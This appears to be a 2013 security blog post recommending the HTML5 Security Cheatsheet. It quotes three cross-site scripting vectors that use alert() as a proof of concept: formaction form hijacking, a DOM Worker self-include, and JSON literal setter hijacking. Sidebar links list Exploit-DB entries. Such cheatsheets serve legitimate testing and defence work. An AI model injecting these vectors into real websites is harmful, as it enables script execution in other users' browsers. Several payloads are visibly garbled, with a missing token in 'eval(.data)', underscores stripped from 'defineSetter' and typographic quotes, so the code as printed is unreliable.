HTML5 Security Cheatsheet | darksecurity.de

Warning: opendir(/var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/sh/3.0.83.2/scripts/): failed to open dir: No such file or directory in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 26

Warning: Invalid argument supplied for foreach() in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 170
Skip to content

HTML5 Security Cheatsheet

Posted by Stefan Schurtz on Sunday, December 1. 2013

Here you can find the HTML5 Security Cheatsheet, which is a nice source of some good XSS payloads.

For Example:

XSS via formaction – requiring user interaction (1)

A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form

<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>

Self-including DOM Worker XSS

A self-including code snippet utilizing a DOM worker and firing a message event to itself causing script execution

0?<script>Worker("#").onmessage=function()eval(.data)</script> :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’))

Self-hijacking JSON literals

In case parts of a JSON literal are controlled by user input there’s a risk to allow auto-harvesting values from later object members.

<script>[{‘a’:Object.prototype.defineSetter(‘b’,function(){alert(arguments[0])}),‘b’:[‘secret’]}]</script>

Trackbacks

Trackback specific URI for this entry

No Trackbacks

Comments

Display comments as Linear | Threaded

No comments

Add Comment

Name

Email

Homepage

Comment

In reply to

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.

CAPTCHA 1

CAPTCHA 2

CAPTCHA 3

CAPTCHA 4

CAPTCHA 5

Enter the string from the spam-prevention image above:

Textile-formatting allowed

You can use [geshi lang=lang_name [,ln={y|n}]][/geshi] tags to embed source code snippets.

Form options

Remember Information?

Subscribe to this entry

Submitted comments will be subject to moderation before being displayed.

Sidebar

Calendar

Werbung

Exploit-DB updates by Offensive Security

[webapps] Flowise 1.6.5 - Authentication Bypass

Sunday, April 21. 2024

[webapps] Laravel Framework 11 - Credential Leakage

Sunday, April 21. 2024

[webapps] SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated)

Sunday, April 21. 2024

[webapps] Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution

Sunday, April 21. 2024

[webapps] FlatPress v1.3 - Remote Command Execution

Sunday, April 21. 2024

OpenBSD Journal

pfctl(8) and systat(8) to display fragment reassembly statistics

Tuesday, April 23. 2024

Coming soon to a -current system near you: parallel raw IP input

Thursday, April 18. 2024

In -current, default write format for tar(1) changed to "pax"

Wednesday, April 17. 2024

OpenSMTPD 7.5.0p0 Released

Wednesday, April 10. 2024

20 years since "and we're just starting": undeadly.org turns 20 (2024-04-09)

Tuesday, April 9. 2024

OpenBSD 7.5 released

Friday, April 5. 2024

LibreSSL 3.8.4 and 3.9.1 released

Thursday, March 28. 2024

OpenSSH 9.7/9.7p1 released!

Tuesday, March 12. 2024

Game of Trees 0.97 released

Monday, March 11. 2024

Archives

Blog Administration

Open login screen

Imprint | Contact | Privacy Statement

Warning: opendir(/var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/sh/3.0.83.2/scripts/): failed to open dir: No such file or directory in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 26

Warning: Invalid argument supplied for foreach() in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 170